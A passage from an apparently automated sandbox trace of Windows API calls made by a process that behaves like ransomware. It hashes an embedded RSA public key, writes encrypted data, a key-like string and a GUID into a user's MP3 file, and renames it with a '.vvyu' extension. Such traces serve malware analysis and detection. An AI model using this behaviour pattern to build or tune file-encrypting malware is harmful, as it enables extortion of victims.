KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.768] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.768] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.769] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.769] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.769] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.769] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.769] GetLastError () returned 0x0 [0188.769] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.769] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.770] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.770] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.770] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16050) returned 0x2af5168 [0188.771] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0188.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2890 [0188.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9a0 [0188.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9b8 [0188.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9e8 [0188.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da48 [0188.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da00 [0188.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.772] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0188.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0188.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da48 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da00 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d9e8 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0188.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0188.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0188.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.775] GetCurrentThreadId () returned 0x5d8 [0188.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee920 [0188.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.776] GetCurrentThreadId () returned 0x5d8 [0188.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da48 [0188.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9e8 [0188.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da00 [0188.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9d0 [0188.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da60 [0188.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0188.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da30 [0188.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da18 [0188.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da78 [0188.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da18 [0188.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9e8 [0188.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0188.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0188.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0188.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0188.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0188.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0188.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0188.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0188.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.787] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x16040, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x16040, lpOverlapped=0x0) returned 1 [0188.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.802] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16045, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.802] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.803] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.804] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.804] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.804] CloseHandle (hObject=0x584) returned 1 [0188.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0188.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0188.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0188.806] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\z8twGmunEhQoxqFe1k.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\z8twgmunehqoxqfe1k.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\z8twGmunEhQoxqFe1k.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\z8twgmunehqoxqfe1k.mp3.vvyu")) returned 1 [0188.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.808] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0188.810] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55093470, ftCreationTime.dwHighDateTime=0x1d89911, ftLastAccessTime.dwLowDateTime=0x17b3c5e0, ftLastAccessTime.dwHighDateTime=0x1d8a0d7, ftLastWriteTime.dwLowDateTime=0x17b3c5e0, ftLastWriteTime.dwHighDateTime=0x1d8a0d7, nFileSizeHigh=0x0, nFileSizeLow=0x16045, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z8twGmunEhQoxqFe1k.mp3", cAlternateFileName="Z8TWGM~1.MP3")) returned 0 [0188.810] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0188.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0188.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0188.811] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0188.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0188.811] PeekMessageW (in: 